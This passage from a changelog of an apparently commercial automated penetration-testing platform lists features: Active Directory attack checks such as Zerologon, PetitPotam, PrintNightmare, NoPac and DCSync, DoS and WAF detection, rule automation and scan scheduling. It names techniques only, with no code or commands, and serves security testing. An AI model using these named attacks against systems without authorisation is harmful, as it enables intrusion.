• Delegation attacks.
• Token impersonation.
• SID history injection.
• RID hijacking.
• DCSync rights.
• SMB signing checks (Unauthenticated).
• LDAP signing verification (Unauthenticated).
• Null session testing (Unauthenticated).
• GPP password exposure (Standard User).
• LAPS configuration checks (Standard User).
• DS replication rights (Standard User).
• Zerologon (Unauthenticated).
• PetitPotam (Unauthenticated).
• PrintNightmare (Standard User).
• NoPac (Standard User).
• SAM dump attempts (Standard User).

2025-02-28 · DoS Detection with 9 Methods · minor

Highlights

• SYN Flood detection.
• UDP Flood detection.
• ICMP Flood detection.
• Slowloris detection.
• HTTP Flood detection.
• NTP Amplification detection.
• LAND Attack detection.
• DNS Amplification detection.
• Individual services (TCP ports) DoS detection.

Improvements

• Advanced detection system for GOV organizations in ANPTT module.
• Demonstration of potential attack vectors including DoS exploits.
• Testing resilience against distributed DDoS attacks from multiple sources.

2025-02-26 · Advanced WAF & DDoS Protection Detection · major

Highlights

• Cloudflare, Akamai, Imperva detection - TTL and ASN-based.
• Firewalls detection (AWS Shield, Fortinet, etc.) - TCP RST connection resets.
• WAFs detection (Cloudflare, ModSecurity, Imperva, etc.) - HTTP method filtering and header analysis.
• DDoS Rate-Limiting - identifying artificial response delays.
• CAPTCHA Protection - detecting reCAPTCHA challenges and JS verifications.
• User-Agent Filtering - bot blocking and fingerprinting defenses.

Improvements

• Intelligent network tests analyzing response times, headers, TTL.
• Connection resets and behavioral patterns analysis.
• Exact protection identification beyond 403 errors.

2025-02-21 · DRSE Rules Enhancement · major

Highlights

• Variable Support in Actions - dynamic rule variables.
• Real-Time Toast Notifications via SSE with MQ buffering.
• Live Alerts via Actions - toast messages in real time.
• Trigger Multiple Actions in a Rule.

Improvements

• Status updates tracking for ongoing operations.
• Do Not Disturb mode for notifications.
• Start scan/pentest on detected host/port.
• Execute script or custom logic.
• Refine data immediately without waiting for full processing.

2025-02-17 · WAF Detection in OnlineTools · minor

Highlights

• WAF Detection support in OnlineTools version 3.0.267.

Improvements

• Future releases will include automatic scanning parameter adjustments when WAF is detected.

2025-02-14 · Pentesterra Platform Launch · major

Highlights

• Agentless SaaS/PaaS solution.
• Attack Surface Management (ASM).
• Breach Attack Simulation (BAS).
• Automated Network Penetration Testing (ANPTT).
• Vulnerability Management (VM).
• Automated and scalable deployment with thousands of scanner nodes.
• AI-powered testing with real penetration testing tasks.
• DRSE (Dynamic Rule Set Engine) for automation management.
• Passive and active scanning (mdns/arp/Shodan/etc).
• API integrations with existing VM/ASM/BAS solutions.

Improvements

• Cost-effective solution without expensive security experts.
• Automated vulnerability detection and attack path mapping.
• Real-time security insights.
• Seamless workflow automation.

2024-11-22 · v3.1.70 · Enhanced Scheduled Scan Management · major

Highlights

• System templates now available.
• Copy system templates into custom templates for organization.
• Custom templates secure and accessible only to authorized users.
• Flexible Scheduling Options - single scan profile for multiple schedules.
• Run Now - start immediately.
• Run Once - schedule a one-time scan.
• Daily - run at fixed time every day.
• Weekly - schedule weekly scans.
• Monthly - plan monthly scans effortlessly.
• Node Selection for Scans - specify which node executes scan.
• Use any available scanner option when specified node unavailable.

Improvements

• Simplified onboarding process.
• Efficient reuse of scanning profiles.
• Secure access to scan results for authorized users only.